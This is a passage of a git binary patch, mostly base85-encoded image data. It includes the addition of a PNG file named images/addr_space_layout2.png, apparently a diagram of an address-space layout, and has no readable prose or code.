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 PK?Bn_{ij^d<>mhXdW*g! literal 0 HcmV?d00001 diff --git a/images/addr_space_layout2.png b/images/addr_space_layout2.png new file mode 100644 index 0000000000000000000000000000000000000000..1be10809113116117ee9cc7ba4a11f5f11f17c07 GIT binary patch literal 56975 zcmeFZXH-+&*Dp#FP^2p$RY8e}G((fFMyh}mK|ujgLT?fXH4u5!AOa!?giw@Tq-f}& zL2%?lw5~%?~;N~pvd(XMbob&gaJL$HK z8UG2%6Krg3{1)aQdp0&sJvKHDLtbu{WaBG;3+wB6i21!R*6$Ple%P;HL`AZMXCOE4 zLL7p@5a`1vUTjb(RMj`gKkU)N5HHo>C*CNkfg~H-SvCvMHOI)jRT8xQ!X~qKeZre> zz;j!*ZE5)W)&;I%1zx)w=RvP6MU+5#$6@BfiDx~9J3zD!`pkff*V_lKMqS26)Eg z{L|$_fW!^by#YTYJ!n z*-r}geRy;=K{SDg9+P8Zv@-k+9W4Jf6eal7l6idd<$Ajv`f)tf2fWGQ%%KdfCLhyw zeyt!cFHe|Zb#T3ceg?0GUqFuqv!PlToN*49{_|&*6OfX%93lbq8tu`vf6U_%G`=d> z@`5};59rF4W5nEhkLenoJKSUkmKgW8GO7*lbw+@}3JGd#1Ds((g-mE9It6uyiphjQp=SMqvpcMb~ zu>&4mSGaA=j|zW+HZDMB)w$3}G6UE3Hj|53-8i?{&b>`9N1rhU^{ky+tc z1^Hd1_}w!S$75@uR!R;_akGPjw$Iq>SP^2|Gq^H-)rtyp2tI8SUBDr8<}WTlf7Trf zAucN?tW7hE#Wp2R2AqgJbC)Lv71_V3I;_e7%fD-zCUqnol<^4kJCWw86J>!432Sf} zMETRra?Qn7hO83a9@|7bJPM_I6Pk`C7$(#pGPd%tQy_;9tAs8LgQuqb=)<%E0xX3R zE*{4p!<~G^?Iyo(lD|R~3)s4iN%xZDn1TSe7ky*B=fb(qtBHB z41Q6ioCDR-7vRMSDkD`7vA*D@28``e4Tt3r%T}DZ$hG5n=8J%kMRrUJ1E8|dsPq?5 z^xK!1=X+1=Cr=9r*EvrW)czj9JxeE&&DbY$i4*W6PH^>4@As?pc}s>dhruH-nIl!v zrn@z2pb#k1OI#T`wY_REWD?H!*hv1bKMx1q~zix=Oj4fL7 z4A-i_hX63jFGxOpC*9N^m9lFbFC}4k!M1T^&nw77Y*uB~8d~`ChL_9<+zo@gsE)C8 z%A0o6g-0&!AH(T=q)2NvT!40w=@Dnq!SC|3b-%h>a=$t^sPYJtJ|yG`Aqit!GKZ$-A<-P? zINugXUs4E{DQmjztdO1~t%Qx!)JVz!Bjthxs++ew?ZTM@F{&3@QKmS-I|o z4kuSG*6xS#oSz*f^;PD?-C5sR>egl) zFy=c>z)GjOCM&LK>&(oxt>7rQ#GgeAj}J&gUoaqt=wkgxYZTY%3qDfF@?kOH zh*D%A$?r@|F2?xQ;>wceUIcJTk700>InI9t-GN_qnq%x<{(Cm$-k3jY01DKhwJnLqczhfPJkocAUodl@Anmt)-0CeL;}RRS_NG?Wxd&50N}l-@hp*G?ôUL?5LEMpO8w=KmvK1 zDIVTW|AdT7t9W}UfM@#l+Zo&f2Q0THTI45=M6TJC{B3VsJVlWRUpfoapCt8a?HPee zEF_$)DO}n?lJNo7!9Vh@jv2_L*F2e( zofVs-9KHf!o3!&8Z=L2FRYR0C-dU$lsB|xR2Mb$EPVhKcOz8kj4WuY>I=m)s4t8~d zRqRLSU5rdd`=`xDmoHyGpn<;lTwRx&1FF6{x6fs0CS4ewG=4@%P^C@_ow7`FFJYvw zPz)^geP%BeefuLiCsCKTQ5!`o%!MCjOJr95_3K}Gwne|vonQ?V77SC$5>&xw1XU?b6Ut#ULp`DMoItpIqH2NSV z`5yQ~`mLJ%xe?mLD7T}DFP&&n@l{W9*OG2t*G9p83@|3-DdcosPN@cZ7n3!t=PffLcGM? zPx5ObklM8~4&eu%wwlX+-$rwvxZAjOW};@yd~y3AEb6tS7GHPDp*X@Nj?-^Ad>EF~7kcKVVvv2UhtJv2;3(Q`7H|3_5qnpIev{7>h z0f-UT^X9*j^CpY0#CAF^P0_aXD6-!P9k=+z!{>bOz#i&Vnd%+Wb7_D)dU%OPuRCML zlVOH^<#2a~fj%(R(ko=^>LZZd74Y8)dyhowe>v)ocYO%Wk3#YO6yVk_=>gw?2te|D zsA!M;Ek0q+Z;sW zWNQv`1HIn9opo4#+IO(ODL(i_e-_WJVi%%wqVRWlJ__}7Yv2Vr7nzC&(yj3a z%@g_nW%?kN{BlD;(eM6=#WqHlWM**zZCK;t$mx`gC-gMR^lIGD%g1|1y-P|LU7I)U 